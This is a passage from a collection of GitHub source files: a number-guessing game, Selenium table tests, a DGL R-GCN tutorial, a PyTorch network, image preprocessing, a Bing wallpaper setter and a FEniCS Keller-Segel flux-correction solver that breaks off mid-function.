ganaste el juego')\n win = True\n break\n elif numero < rand:\n print('Fallaste, tienes ' + str(vueltas-i)+' oportunidades mas')\n numero = int(input('El numero ingresado es menor al calculado por la PC, intenta subiendo un poco: '))\n os.system('clear')\n elif numero > rand:\n print('Fallaste, tienes ' + str(vueltas-i)+' oportunidades mas')\n numero = int(input('El numero ingresado es mayor al calculado por la PC, intenta bajando un poco: '))\n os.system('clear')\n if win == False:\n \n print('Ni modo perdiste, vuelve a intentarlo (talvez en un nivel mas facil)') \n\nif __name__ == '__main__':\n run()","repo_name":"avasquez-80/PracticasPython","sub_path":"juego_numeros.py","file_name":"juego_numeros.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30942420416","text":"from tests.uitestwrapper import UiTestWrapper\nfrom seleniumpm.webelements.table import Table\nfrom seleniumpm.locator import Locator\nfrom selenium.webdriver.common.by import By\n\n\nclass TestTable(UiTestWrapper):\n def test_instantiate_table(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n assert table != None\n\n def test_two_table_are_equal(self):\n xpath = \"//table\"\n table1 = Table(self.driver, Locator(By.XPATH, xpath))\n table2 = Table(self.driver, Locator(By.XPATH, xpath))\n assert table1 == table2\n assert not (table1 != table2)\n\n def test_two_table_are_not_equal_by_value(self):\n xpath = \"//table\"\n xpath2 = \"//table/bar\"\n table1 = Table(self.driver, Locator(By.XPATH, xpath))\n table2 = Table(self.driver, Locator(By.XPATH, xpath2))\n assert table1 != table2\n assert not (table1 == table2)\n\n def test_get_locator(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n # Get 2nd row 4th column\n assert table.get_locator(1, 3) == Locator(By.XPATH, \"{}{}\".format(xpath, \"/tbody/tr[1]/td[3]\"))\n # Get 1st row 2nd column\n assert table.get_locator(0, 1) == Locator(By.XPATH, \"{}{}\".format(xpath, \"/tbody/tr[0]/td[1]\"))\n # Get 30th row 5th column\n assert table.get_locator(29, 4) == Locator(By.XPATH, \"{}{}\".format(xpath, \"/tbody/tr[29]/td[4]\"))\n\n\n def test_get_rows(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n rows = table.get_rows()\n assert isinstance(rows, list)\n assert len(rows) == 0\n\n def test_count_rows(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n count = table.count_rows()\n assert count == 0\n\n def test_error_if_specify_table_with_non_xpath_locator(self):\n xpath = \"//table\"\n try:\n Table(self.driver, Locator(By.CLASS_NAME, xpath))\n assert False, \"Expected there to be an AttributeError\"\n except AttributeError:\n pass\n","repo_name":"gradeawarrior/python-seleniumpm","sub_path":"tests/webelements/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71587609121","text":"\"\"\"\r\n.. _model-rgcn:\r\n\r\nRelational Graph Convolutional Network\r\n================================================\r\n\r\n**Author:** Lingfan Yu, Mufei Li, Zheng Zhang\r\n\r\n.. warning::\r\n\r\n The tutorial aims at gaining insights into the paper, with code as a mean\r\n of explanation. The implementation thus is NOT optimized for running\r\n efficiency. 
For recommended implementation, please refer to the `official\r\n examples `_.\r\n\r\nIn this tutorial, you learn how to implement a relational graph convolutional\r\nnetwork (R-GCN). This type of network is one effort to generalize GCN \r\nto handle different relationships between entities in a knowledge base. To \r\nlearn more about the research behind R-GCN, see `Modeling Relational Data with Graph Convolutional\r\nNetworks `_ \r\n\r\nThe straightforward graph convolutional network (GCN) exploits\r\nstructural information of a dataset (that is, the graph connectivity) in order to\r\nimprove the extraction of node representations. Graph edges are left as\r\nuntyped.\r\n\r\nA knowledge graph is made up of a collection of triples in the form\r\nsubject, relation, object. Edges thus encode important information and\r\nhave their own embeddings to be learned. Furthermore, there may exist\r\nmultiple edges among any given pair.\r\n\r\n\"\"\"\n###############################################################################\n# A brief introduction to R-GCN\n# ---------------------------\n# In *statistical relational learning* (SRL), there are two fundamental\n# tasks:\n#\n# - **Entity classification** - Where you assign types and categorical\n# properties to entities.\n# - **Link prediction** - Where you recover missing triples.\n#\n# In both cases, missing information is expected to be recovered from the\n# neighborhood structure of the graph. For example, the R-GCN\n# paper cited earlier provides the following example. Knowing that Mikhail Baryshnikov was educated at the Vaganova Academy\n# implies both that Mikhail Baryshnikov should have the label person, and\n# that the triple (Mikhail Baryshnikov, lived in, Russia) must belong to the\n# knowledge graph.\n#\n# R-GCN solves these two problems using a common graph convolutional network. It's\n# extended with multi-edge encoding to compute embedding of the entities, but\n# with different downstream processing.\n#\n# - Entity classification is done by attaching a softmax classifier at the\n# final embedding of an entity (node). Training is through loss of standard\n# cross-entropy.\n# - Link prediction is done by reconstructing an edge with an autoencoder\n# architecture, using a parameterized score function. Training uses negative\n# sampling.\n#\n# This tutorial focuses on the first task, entity classification, to show how to generate entity\n# representation. `Complete\n# code `_\n# for both tasks is found in the DGL Github repository.\n#\n# Key ideas of R-GCN\n# -------------------\n# Recall that in GCN, the hidden representation for each node :math:`i` at\n# :math:`(l+1)^{th}` layer is computed by:\n#\n# .. math:: h_i^{l+1} = \\sigma\\left(\\sum_{j\\in N_i}\\frac{1}{c_i} W^{(l)} h_j^{(l)}\\right)~~~~~~~~~~(1)\\\\\n#\n# where :math:`c_i` is a normalization constant.\n#\n# The key difference between R-GCN and GCN is that in R-GCN, edges can\n# represent different relations. In GCN, weight :math:`W^{(l)}` in equation\n# :math:`(1)` is shared by all edges in layer :math:`l`. In contrast, in\n# R-GCN, different edge types use different weights and only edges of the\n# same relation type :math:`r` are associated with the same projection weight\n# :math:`W_r^{(l)}`.\n#\n# So the hidden representation of entities in :math:`(l+1)^{th}` layer in\n# R-GCN can be formulated as the following equation:\n#\n# .. 
math:: h_i^{l+1} = \\sigma\\left(W_0^{(l)}h_i^{(l)}+\\sum_{r\\in R}\\sum_{j\\in N_i^r}\\frac{1}{c_{i,r}}W_r^{(l)}h_j^{(l)}\\right)~~~~~~~~~~(2)\\\\\n#\n# where :math:`N_i^r` denotes the set of neighbor indices of node :math:`i`\n# under relation :math:`r\\in R` and :math:`c_{i,r}` is a normalization\n# constant. In entity classification, the R-GCN paper uses\n# :math:`c_{i,r}=|N_i^r|`.\n#\n# The problem of applying the above equation directly is the rapid growth of\n# the number of parameters, especially with highly multi-relational data. In\n# order to reduce model parameter size and prevent overfitting, the original\n# paper proposes to use basis decomposition.\n#\n# .. math:: W_r^{(l)}=\\sum\\limits_{b=1}^B a_{rb}^{(l)}V_b^{(l)}~~~~~~~~~~(3)\\\\\n#\n# Therefore, the weight :math:`W_r^{(l)}` is a linear combination of basis\n# transformation :math:`V_b^{(l)}` with coefficients :math:`a_{rb}^{(l)}`.\n# The number of bases :math:`B` is much smaller than the number of relations\n# in the knowledge base.\n#\n# .. note::\n# Another weight regularization, block-decomposition, is implemented in\n# the `link prediction `_.\n#\n# Implement R-GCN in DGL\n# ----------------------\n#\n# An R-GCN model is composed of several R-GCN layers. The first R-GCN layer\n# also serves as input layer and takes in features (for example, description texts)\n# that are associated with node entity and project to hidden space. In this tutorial,\n# we only use the entity ID as an entity feature.\n#\n# R-GCN layers\n# ~~~~~~~~~~~~\n#\n# For each node, an R-GCN layer performs the following steps:\n#\n# - Compute outgoing message using node representation and weight matrix\n# associated with the edge type (message function)\n# - Aggregate incoming messages and generate new node representations (reduce\n# and apply function)\n#\n# The following code is the definition of an R-GCN hidden layer.\n#\n# .. note::\n# Each relation type is associated with a different weight. Therefore,\n# the full weight matrix has three dimensions: relation, input_feature,\n# output_feature.\n#\n# .. note::\n#\n# This is showing how to implement an R-GCN from scratch. 
DGL provides a more\n# efficient :class:`builtin R-GCN layer module `.\n#\n\nimport os\n\nos.environ[\"DGLBACKEND\"] = \"pytorch\"\nfrom functools import partial\n\nimport dgl\nimport dgl.function as fn\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl import DGLGraph\n\n\nclass RGCNLayer(nn.Module):\n def __init__(\n self,\n in_feat,\n out_feat,\n num_rels,\n num_bases=-1,\n bias=None,\n activation=None,\n is_input_layer=False,\n ):\n super(RGCNLayer, self).__init__()\n self.in_feat = in_feat\n self.out_feat = out_feat\n self.num_rels = num_rels\n self.num_bases = num_bases\n self.bias = bias\n self.activation = activation\n self.is_input_layer = is_input_layer\n\n # sanity check\n if self.num_bases <= 0 or self.num_bases > self.num_rels:\n self.num_bases = self.num_rels\n # weight bases in equation (3)\n self.weight = nn.Parameter(\n torch.Tensor(self.num_bases, self.in_feat, self.out_feat)\n )\n if self.num_bases < self.num_rels:\n # linear combination coefficients in equation (3)\n self.w_comp = nn.Parameter(\n torch.Tensor(self.num_rels, self.num_bases)\n )\n # add bias\n if self.bias:\n self.bias = nn.Parameter(torch.Tensor(out_feat))\n # init trainable parameters\n nn.init.xavier_uniform_(\n self.weight, gain=nn.init.calculate_gain(\"relu\")\n )\n if self.num_bases < self.num_rels:\n nn.init.xavier_uniform_(\n self.w_comp, gain=nn.init.calculate_gain(\"relu\")\n )\n if self.bias:\n nn.init.xavier_uniform_(\n self.bias, gain=nn.init.calculate_gain(\"relu\")\n )\n\n def forward(self, g):\n if self.num_bases < self.num_rels:\n # generate all weights from bases (equation (3))\n weight = self.weight.view(\n self.in_feat, self.num_bases, self.out_feat\n )\n weight = torch.matmul(self.w_comp, weight).view(\n self.num_rels, self.in_feat, self.out_feat\n )\n else:\n weight = self.weight\n if self.is_input_layer:\n\n def message_func(edges):\n # for input layer, matrix multiply can be converted to be\n # an embedding lookup using source node id\n embed = weight.view(-1, self.out_feat)\n index = edges.data[dgl.ETYPE] * self.in_feat + edges.src[\"id\"]\n return {\"msg\": embed[index] * edges.data[\"norm\"]}\n\n else:\n\n def message_func(edges):\n w = weight[edges.data[dgl.ETYPE]]\n msg = torch.bmm(edges.src[\"h\"].unsqueeze(1), w).squeeze()\n msg = msg * edges.data[\"norm\"]\n return {\"msg\": msg}\n\n def apply_func(nodes):\n h = nodes.data[\"h\"]\n if self.bias:\n h = h + self.bias\n if self.activation:\n h = self.activation(h)\n return {\"h\": h}\n\n g.update_all(message_func, fn.sum(msg=\"msg\", out=\"h\"), apply_func)\n\n\n###############################################################################\n# Full R-GCN model defined\n# ~~~~~~~~~~~~~~~~~~~~~~~\n\n\nclass Model(nn.Module):\n def __init__(\n self,\n num_nodes,\n h_dim,\n out_dim,\n num_rels,\n num_bases=-1,\n num_hidden_layers=1,\n ):\n super(Model, self).__init__()\n self.num_nodes = num_nodes\n self.h_dim = h_dim\n self.out_dim = out_dim\n self.num_rels = num_rels\n self.num_bases = num_bases\n self.num_hidden_layers = num_hidden_layers\n\n # create rgcn layers\n self.build_model()\n\n # create initial features\n self.features = self.create_features()\n\n def build_model(self):\n self.layers = nn.ModuleList()\n # input to hidden\n i2h = self.build_input_layer()\n self.layers.append(i2h)\n # hidden to hidden\n for _ in range(self.num_hidden_layers):\n h2h = self.build_hidden_layer()\n self.layers.append(h2h)\n # hidden to output\n h2o = self.build_output_layer()\n self.layers.append(h2o)\n\n # 
initialize feature for each node\n def create_features(self):\n features = torch.arange(self.num_nodes)\n return features\n\n def build_input_layer(self):\n return RGCNLayer(\n self.num_nodes,\n self.h_dim,\n self.num_rels,\n self.num_bases,\n activation=F.relu,\n is_input_layer=True,\n )\n\n def build_hidden_layer(self):\n return RGCNLayer(\n self.h_dim,\n self.h_dim,\n self.num_rels,\n self.num_bases,\n activation=F.relu,\n )\n\n def build_output_layer(self):\n return RGCNLayer(\n self.h_dim,\n self.out_dim,\n self.num_rels,\n self.num_bases,\n activation=partial(F.softmax, dim=1),\n )\n\n def forward(self, g):\n if self.features is not None:\n g.ndata[\"id\"] = self.features\n for layer in self.layers:\n layer(g)\n return g.ndata.pop(\"h\")\n\n\n###############################################################################\n# Handle dataset\n# ~~~~~~~~~~~~~~~~\n# This tutorial uses Institute for Applied Informatics and Formal Description Methods (AIFB) dataset from R-GCN paper.\n\n# load graph data\ndataset = dgl.data.rdf.AIFBDataset()\ng = dataset[0]\ncategory = dataset.predict_category\ntrain_mask = g.nodes[category].data.pop(\"train_mask\")\ntest_mask = g.nodes[category].data.pop(\"test_mask\")\ntrain_idx = torch.nonzero(train_mask, as_tuple=False).squeeze()\ntest_idx = torch.nonzero(test_mask, as_tuple=False).squeeze()\nlabels = g.nodes[category].data.pop(\"label\")\nnum_rels = len(g.canonical_etypes)\nnum_classes = dataset.num_classes\n# normalization factor\nfor cetype in g.canonical_etypes:\n g.edges[cetype].data[\"norm\"] = dgl.norm_by_dst(g, cetype).unsqueeze(1)\ncategory_id = g.ntypes.index(category)\n\n###############################################################################\n# Create graph and model\n# ~~~~~~~~~~~~~~~~~~~~~~~\n\n# configurations\nn_hidden = 16 # number of hidden units\nn_bases = -1 # use number of relations as number of bases\nn_hidden_layers = 0 # use 1 input layer, 1 output layer, no hidden layer\nn_epochs = 25 # epochs to train\nlr = 0.01 # learning rate\nl2norm = 0 # L2 norm coefficient\n\n# create graph\ng = dgl.to_homogeneous(g, edata=[\"norm\"])\nnode_ids = torch.arange(g.num_nodes())\ntarget_idx = node_ids[g.ndata[dgl.NTYPE] == category_id]\n\n# create model\nmodel = Model(\n g.num_nodes(),\n n_hidden,\n num_classes,\n num_rels,\n num_bases=n_bases,\n num_hidden_layers=n_hidden_layers,\n)\n\n###############################################################################\n# Training loop\n# ~~~~~~~~~~~~~~~~\n\n# optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=l2norm)\n\nprint(\"start training...\")\nmodel.train()\nfor epoch in range(n_epochs):\n optimizer.zero_grad()\n logits = model.forward(g)\n logits = logits[target_idx]\n loss = F.cross_entropy(logits[train_idx], labels[train_idx])\n loss.backward()\n\n optimizer.step()\n\n train_acc = torch.sum(logits[train_idx].argmax(dim=1) == labels[train_idx])\n train_acc = train_acc.item() / len(train_idx)\n val_loss = F.cross_entropy(logits[test_idx], labels[test_idx])\n val_acc = torch.sum(logits[test_idx].argmax(dim=1) == labels[test_idx])\n val_acc = val_acc.item() / len(test_idx)\n print(\n \"Epoch {:05d} | \".format(epoch)\n + \"Train Accuracy: {:.4f} | Train Loss: {:.4f} | \".format(\n train_acc, loss.item()\n )\n + \"Validation Accuracy: {:.4f} | Validation loss: {:.4f}\".format(\n val_acc, val_loss.item()\n )\n )\n###############################################################################\n# .. 
_link-prediction:\n#\n# The second task, link prediction\n# --------------------------------\n# So far, you have seen how to use DGL to implement entity classification with an\n# R-GCN model. In the knowledge base setting, representation generated by\n# R-GCN can be used to uncover potential relationships between nodes. In the\n# R-GCN paper, the authors feed the entity representations generated by R-GCN\n# into the `DistMult `_ prediction model\n# to predict possible relationships.\n#\n# The implementation is similar to that presented here, but with an extra DistMult layer\n# stacked on top of the R-GCN layers. You can find the complete\n# implementation of link prediction with R-GCN in our `Github Python code\n# example `_.\n","repo_name":"dmlc/dgl","sub_path":"tutorials/models/1_gnn/4_rgcn.py","file_name":"4_rgcn.py","file_ext":"py","file_size_in_byte":14921,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"28155461987","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ValueNetwork(nn.Module):\n def __init__(self,inputDims, layerDims, outputDims):\n\n super(ValueNetwork, self).__init__()\n\n self.processingLayers = []\n self.layerDims = layerDims\n self.layerDims.insert(0,inputDims)\n self.layerDims.append(outputDims)\n\n for idx in range(len(self.layerDims)-1):\n self.processingLayers.append(nn.Linear(self.layerDims[idx], self.layerDims[idx+1]))\n\n list_param = []\n for a in self.processingLayers:\n list_param.extend(list(a.parameters()))\n\n self.LayerParams = nn.ParameterList(list_param)\n\n def forward(self, inputs):\n\n out = inputs\n for layers in self.processingLayers[:-1]:\n out = layers(out)\n out = F.relu(out)\n\n out = self.processingLayers[-1](out)\n\n return out\n","repo_name":"raharrasy/RL2019-BaseCodes","sub_path":"Exercise3/ExampleUnitTests/SampleNetworks.py","file_name":"SampleNetworks.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"15830376953","text":"from PIL import Image\nimport os\nfrom skimage import io\nfrom skimage import exposure\n\n\n# Функція модифікації та збереження даного зображення\ndef image_modification(filename, carent_folder):\n \"\"\"\n The functon getting name of image and doing next changes with it:\n - convert to jpg format\n - change size of image to 227*227\n - convert to RGB format\n - normalize of image\n - save modify image\n\n :param filename: name of image for modification (str)\n :param carent_folder: name of directory for saving modified image\n\n \"\"\"\n\n # отримуємо розширення зображення\n ext = os.path.splitext(filename)[1]\n\n # Якщо розширення не .jpg, конвертуємо зображення в даний формат\n if ext != '.jpg':\n with Image.open(os.path.join(carent_folder, filename)) as img:\n img = img.convert('RGB')\n filename = os.path.splitext(filename)[0] + '.jpg'\n img.save(os.path.join(carent_folder, filename), 'JPEG')\n\n\n # Відкриваємо зображення для виконання операцій над ним\n with Image.open(os.path.join(carent_folder, filename)) as img:\n\n # змінюємо формат розміру на 227х227\n img = img.resize((227, 227))\n\n # конвертуємо зображення в RGB тип\n img = img.convert('RGB')\n # img = img.convert('L')\n\n # зберігаємо результат перетворень\n img.save(os.path.join(carent_folder, filename))\n\n # відкриваємо збережене зображення\n image = io.imread(os.path.join(carent_folder, filename))\n\n # виконуємо нормалізацію зображення\n 
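# rescale_intensity stretches the pixel intensities to the full range of the image dtype\n    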
normalized_image = exposure.rescale_intensity(image)\n\n # зберігаємо нормалізоване зображення\n io.imsave(os.path.join(carent_folder, filename), normalized_image)\n\n\n\nif __name__ == '__main__':\n\n # цільова директорія\n data_folder = 'C:/Users/админ/PycharmProjects/PDS2/PDS2_Kofanov/My_project/Clear_version/dataset_parser'\n\n # Відкриваємо дочірні директорії (зберігають зображення окремого класу) в цільовій директорії\n for categoria_folder in os.listdir(data_folder):\n\n # шлях до даної дочірньої директорії\n carent_folder = os.path.join(data_folder, categoria_folder)\n\n # список файлів, що зберігаються в даній дочірній директорії\n folders = os.listdir(os.path.join(data_folder, categoria_folder))\n\n # Для кожного файлу використовуємо функцію модифікації\n for filename in folders:\n image_modification(filename, carent_folder)\n\n\n\n\n\n\n","repo_name":"KofanovE/PDS2_Kofanov","sub_path":"My_project/modify_image.py","file_name":"modify_image.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22499156016","text":"import ctypes\r\nimport requests\r\nfrom lxml import etree\r\nimport logging\r\nimport subprocess\r\n\r\nlogging.basicConfig(level=logging.INFO, filename='log.txt', filemode='a',format='%(asctime)s - %(levelname)s - %(message)s')\r\n\r\n# 获取bing的网页背景图片的链接\r\nurl = \"https://cn.bing.com\"\r\nheaders = {\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35\"}\r\nrs = requests.get(url=url, headers=headers)\r\nhtml = etree.HTML(rs.content)\r\ntry:\r\n img_url = \"https://www.bing.com\" + html.xpath('//link[@id=\"preloadBg\"]/@href')[0] # 获取第一个括号内的内容\r\n img_url = img_url.replace(\"s.cn.bing.net\", \"\")\r\n img_rs = requests.get(url=img_url)\r\nexcept:\r\n img_url = \"https://www.bing.com\" + html.xpath('//link[@id=\"preloadBg\"]/@href')[0][6:] # 获取第一个括号内的内容\r\n img_url = img_url.replace(\"s.cn.bing.net\", \"\")\r\n img_rs = requests.get(url=img_url)\r\n\r\nlogging.info('Downloading image from ' + img_url)\r\n\r\n# 下载图片到本地\r\nimg_path = \"E:\\\\bing-wallpaper-pictures\\\\bing_wallpaper.jpg\" # 你可以修改图片的保存路径\r\nwith open(img_path, \"wb\") as f:\r\n f.write(img_rs.content)\r\n\r\n# 更改壁纸\r\nSPI_SETDESKWALLPAPER = 20 # 系统参数,表示设置壁纸\r\nSPIF_UPDATEINIFILE = 1 # 系统参数,表示更新配置文件\r\nresult = ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, img_path, SPIF_UPDATEINIFILE)\r\nerror_code = ctypes.GetLastError()\r\n\r\n\r\n\r\nlogging.info(result)\r\nlogging.info(error_code)\r\n","repo_name":"aaale1/window_set_backgroud","sub_path":"bing-wallpaper.py","file_name":"bing-wallpaper.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70566656802","text":"# -*- coding: utf-8 -*-\nfrom fenics import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.testing import assert_equal\n\nfrom keller_segel.matrix_default_scheme import (\n KS_Matrix_DefaultScheme, save_coo_matrix )\n\n# Import numba high-performance functions\nfrom keller_segel.numba_optimized import (\n index, compute_D_values, update_F_values )\n\n#==============================================================================\n# class KS_FluxCorrect_DefaultScheme:\n# - Keller-Segel with flux-correction (FC)\n# - Used Numba compiler for high performance (in FC updating of 
matrices)\n#------------------------------------------------------------------------------\n\n#--- Class to ease accessing to matrix data ------------------------------------\n\nclass CSR_Matrix(object):\n    \"\"\"Container for a sparse matrix whose data is accessed using CSR\n    storage format. Current implementation assumes that the PETSC\n    backend is being used by FEniCS. The CSR_Matrix wraps this PETSC\n    backend.\n    \"\"\"\n    def __init__(self, FEniCS_matrix=None):\n        if FEniCS_matrix != None:\n            underlying_PETSc_matrix = as_backend_type(FEniCS_matrix).mat()\n            self.update_internal_data(underlying_PETSc_matrix)\n\n    def update_internal_data(self, PETSc_matrix):\n        self.underlying_PETSc_matrix = PETSc_matrix\n        self.I, self.C, self.V = self.underlying_PETSc_matrix.getValuesCSR()\n        self.size = self.underlying_PETSc_matrix.size\n        self._nrows = self.size[0]\n        self._ncols = self.size[1]\n\n    def nrows(self):\n        return self._nrows #len(I)-1\n\n    def duplicate(self):\n        \"Returns a new CSR_Matrix which is a copy of this\"\n        new_PETSc_matrix = self.underlying_PETSc_matrix.duplicate()\n        new_CSR_matrix = CSR_Matrix()\n        new_CSR_matrix.update_internal_data(new_PETSc_matrix)\n        return new_CSR_matrix\n\n    def get_values_CSR(self):\n        \"Get data arrays defining content of current matrix, using CSR format\"\n        return self.I, self.C, self.V\n\n    def set_values(self, values):\n        \"Set content of this matrix, assuming same nonzero rows and columns\"\n        self.V = values\n        self.underlying_PETSc_matrix.setValuesCSR(self.I, self.C, self.V)\n        self.underlying_PETSc_matrix.assemble()\n\n    def build_tranpose_into_matrix(self, CSR_mat):\n        \"\"\"Build into a CSR_Matrix the transpose of this.\n        warning: previous contents of CSR_mat are not deleted, memory leak?\"\"\"\n        # Build a new PETSc matrix\n        transpose_mat = self.underlying_PETSc_matrix.duplicate()\n        # Copy transpose of underlying_matrix into transpose_mat\n        self.underlying_PETSc_matrix.transpose(transpose_mat)\n        # Assign transpose_mat as underlying PETSc matrix of CSR_mat\n        CSR_mat.update_internal_data(transpose_mat)\n\n    def assert_sparsity_pattern(self, other_CSR_mat):\n        \"\"\"Assert that the positions of nz elements match those in the other matrix\"\"\"\n        assert_equal(self.I, other_CSR_mat.I)\n        assert_equal(self.C, other_CSR_mat.C)\n\n    def to_FEniCS_matrix(self):\n        \"\"\"Build a FEniCS matrix from the current internal CSR values or\n        from new values stored in 'values_array'\n        \"\"\"\n        return PETScMatrix(self.underlying_PETSc_matrix)\n\n#--- Main Flux Correction class ------------------------------------------------\n\nclass KS_FluxCorrect_DefaultScheme(KS_Matrix_DefaultScheme):\n\n    \"\"\"\n    Default Keller-Segel space/time scheme. 
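Antidiffusive fluxes are limited before being added back to the low-order solution (flux-corrected transport). 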
Underlying FE matrices are\n explicitly build and corrected\n \"\"\"\n\n def __init__( self, mesh, fe_order, dt, t_init=0.,\n k0=1, k1=1, k2=1, k3=1, k4=1 ):\n super().__init__(mesh, fe_order, dt, t_init, k0, k1, k2, k3, k4)\n\n def build_fe_scheme(self):\n \"\"\"\n Define variational equations and FE systems which define current scheme\n \"\"\"\n u, ub = TrialFunction(self.Vh), TestFunction(self.Vh)\n v, vb = TrialFunction(self.Vh), TestFunction(self.Vh)\n #\n # Define variational formulation for u and v\n #\n dt, k2, k3 = self.dt, self.k2, self.k3\n\n # Mass matrix\n mass_form = u*ub*dx\n self.M = assemble( mass_form )\n\n # Mass lumping matrix\n mass_action_form = action(mass_form, Constant(1))\n self.ML = assemble(mass_form) # !!!!\n #print(\"type ML:\", type(self.ML))\n self.ML.zero()\n self.ML.set_diagonal(assemble(mass_action_form))\n #print(\"type Mass action form:\", type(mass_action_form))\n # Diffusion matrix\n self.L = assemble( dot(grad(u), grad(ub))*dx )\n\n # Matrix for the v-equation:\n self.Av = (1 + k3*dt)*self.ML + k2*dt*self.L\n\n # Save matrices\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.M, \"M.matrix.coo\")\n save_coo_matrix(self.ML, \"ML.matrix.coo\")\n save_coo_matrix(self.L, \"L.matrix.coo\")\n\n\n def solve(self):\n \"\"\"Compute u and v\"\"\"\n\n dt, k0, k1, k4 = self.dt, self.k0, self.k1, self.k4\n\n ##,-------------------------------------------------------------\n ##| 1. compute v and gradient of v\n ##`-------------------------------------------------------------\n b = self.ML * (self.v0.vector() + k4*dt*self.u0.vector())\n solve ( self.Av, self.v.vector(), b ) # Solve A*v = b\n grad_v = project( grad(self.v), self.Wh )\n\n ##,-------------------------------------------------------------\n ##| 2. Define matrices and compute low order solution, u\n ##`-------------------------------------------------------------\n\n #\n # 2.1 Assemble chemotaxis transport matrix\n #\n u, ub = TrialFunction(self.Vh), TestFunction(self.Vh)\n v, vb = TrialFunction(self.Vh), TestFunction(self.Vh)\n C = assemble( u*dot(grad_v, grad(ub)) * dx )\n\n # Add diffusion matrix (at RHS) => complete advect+diffusion operator\n self.K = k1*C - k0*self.L;\n\n #\n # 2.2 Define D. 
It is an artifficial diffusion matrix D=d_{ij} such that\n # k_{ij} + d_{ij} >= 0 for all i,j\n #\n\n # Build object to access the FEniCS matrix as K a CSR matrix\n K_CSR = CSR_Matrix(self.K)\n # Get arrays defining the storage of K in CSR sparse matrix format,\n I, C, K_vals = K_CSR.get_values_CSR()\n\n # Build a new CSR matrix for the target matrix D\n D_CSR = K_CSR.duplicate()\n # Temporarily, we use the matrix D_CSR for building the transpose of K\n K_CSR.build_tranpose_into_matrix(D_CSR)\n # Get values for the transpose of K\n _, _, T_vals = D_CSR.get_values_CSR()\n\n # Build array with values max(0, -K_ij, -K_ji) for each row i\n D_vals = compute_D_values(I, C, K_vals, T_vals)\n\n # Create the new matrix D, storing the computed array D_vals\n D_CSR.set_values(D_vals)\n self.D = D_CSR.to_FEniCS_matrix()\n\n #\n # 2.3 Eliminate all negative off-diagonal coefficients of K by\n # adding artifficial diffusion\n #\n self.KL = self.D + self.K\n\n #\n # 2.4 Compute low order solution\n #\n U = self.u.vector()\n A = self.ML - dt*self.KL\n b = self.ML * self.u0.vector()\n solve (A, U, b) # Solve A*u = b\n\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.K, \"K.matrix.coo\")\n save_coo_matrix(self.D, \"D.matrix.coo\")\n save_coo_matrix(self.KL, \"KL.matrix.coo\")\n\n\n if self.check_parameter(\"only_low_order_solution\"):\n print(\"Computed the low order solution (only!!)\")\n return()\n\n ##,-------------------------------------------------------------\n ##| 3. Update u system to high order solution\n ##`-------------------------------------------------------------\n\n #\n # 3.1 Compute raw flux: f_ij = (m_ij*d/dt + d_ij)*(u_j-u_i)\n #\n M_CSR = CSR_Matrix(self.M)\n M_CSR.assert_sparsity_pattern(D_CSR) # Same spasity is implicitly assumed below\n F_CSR = M_CSR.duplicate()\n\n # Get arrays defining the storage of M & F in CSR sparse matrix format\n I, C, M_vals = M_CSR.get_values_CSR()\n _, _, F_vals = F_CSR.get_values_CSR()\n\n # Access to PETSc vector data via numpy. This allows optimized code\n u_numpy = self.u.vector().vec().getArray()\n u0_numpy = self.u0.vector().vec().getArray()\n\n # Compute F values\n n = M_CSR.nrows()\n for i in range(n):\n # a) Get pointers to begin and end of nz elements in row i\n i0, i1 = I[i], I[i+1]\n jColumns = C[i0:i1]\n i_diag = i0 + index( jColumns, i ) # Pointer to diagonal elment\n\n diff_u_i = u_numpy[i] - u_numpy[jColumns]\n diff_u0_i = u0_numpy[i] - u0_numpy[jColumns]\n F_vals[i0:i1] = ( M_vals[i0:i1] * (diff_u_i - diff_u0_i) / dt +\n D_vals[i0:i1] * diff_u_i )\n\n F_vals[i_diag] = 0\n # F_vals[i_diag] = np.sum(F_vals[i0:i1])\n\n self.F = F_CSR.to_FEniCS_matrix()\n\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.F, \"FF_previous.matrix.coo\")\n\n # ····· Update residuals: F_ij=0 if F_ij*(u_j-u_i) > 0\n F_vals = update_F_values(I, C, F_vals, u_numpy)\n F_CSR.set_values(F_vals)\n # IS NECCESARY NEXT LINE?\n # self.F = F_CSR.to_FEniCS_matrix()\n\n if self.check_parameter(\"save_matrices\"):\n save_coo_matrix(self.F, \"FF.matrix.coo\")\n\n #\n # 3.2. 
